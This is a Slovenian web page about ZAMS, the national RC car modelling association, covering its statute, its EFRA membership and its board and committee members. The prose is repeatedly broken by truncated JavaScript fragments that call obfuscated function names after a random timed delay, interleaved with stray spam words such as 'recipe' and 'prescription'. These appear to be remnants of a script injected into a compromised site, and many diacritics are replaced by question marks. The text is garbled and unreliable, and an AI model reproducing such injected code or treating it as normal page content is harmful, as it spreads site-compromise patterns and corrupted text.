O Zams

andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}zvitek

 

Objavljam statut zveze ZAMS.

Zveza avtomodelarskih društev Slovenije – ZAMS je krovna organizacija modelarskih društev, andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}recipe ki se ukvarjajo s tekmovalnim avtomodelarstvom.Zveza in njeni organi skrbijo za dolo?anje pravil tekmovanj zaDržavno prvenstvo in izbirajo organizatorje tekmovanj. Na tekmovanjih za DP sodniki ZAMS skrbijo za nemoten potek tekmovanja in nadzorujejo izvajanje pravilnika.

ZAMS je ?lanica mednarodne organizacije avtomodelarskih društev EFRA. Tekmovalci z nacionalno licenco ZAMS lahko nastopajo na mednarodnih EFRA tekmovanjih.

V ZAMS se lahko vklju?ijo vsa slovenska modelarska društva, andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}prescription ki se ukvarjajo z avtomodelarstvom. ?lani društev, vklju?enih v ZAMS, lahko pridobijo nacionalno licenco za nastopanje na tekmovanjih za Državno prvenstvo.

andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}STATUT (datoteka *.pdf)

 

?lani upravnega odbora (UO) in tehni?no tekmovalne komisije (TTK)

Na izredni skupš?ini so bili potrjeni in izglasovani ?lani za Upravni Odbor in Tehni?no Tekmovalno Komisijo.

?lani so slede?i :

Upravni odbor :

 • Danilo Mlekuž ali Miha Mlekuž – MK Tolmin,
 • Borut Svoljšak – MSM Maribor,
 • Jure Špeh – DMA Modra ptica,
 • Ivan Turk – MK Logatec,
 • Jernej Vuga ali Erik Klanjš?ek – MD Nova Gorica
 • Gašper Šimc – ŠMD Zeleni dol
 • Sašo Kramljak – Gas Tuning Team
 • Tadej Logar – K.R.T.K. Hrastnik
 • Uroš Ploj – Dromios
 • Žarko Vuga – predstavnik EFRA

TTK :

Aktivne kategorije :

 • 1:8 Buggy Nitro – Gašper Šimc, Luka Kranjc
 • 1:8 Elekro Offroad –Goran Vignjevi?
 • 1:10 200mm Nitro – Vladimir Knehtl

Neaktivne kategorije :

 • 1:8 IC – Jernej Vuga
 • 1:5 GT – Dejan Ivanuš
 • 1:6 Offroad – Ivan Turk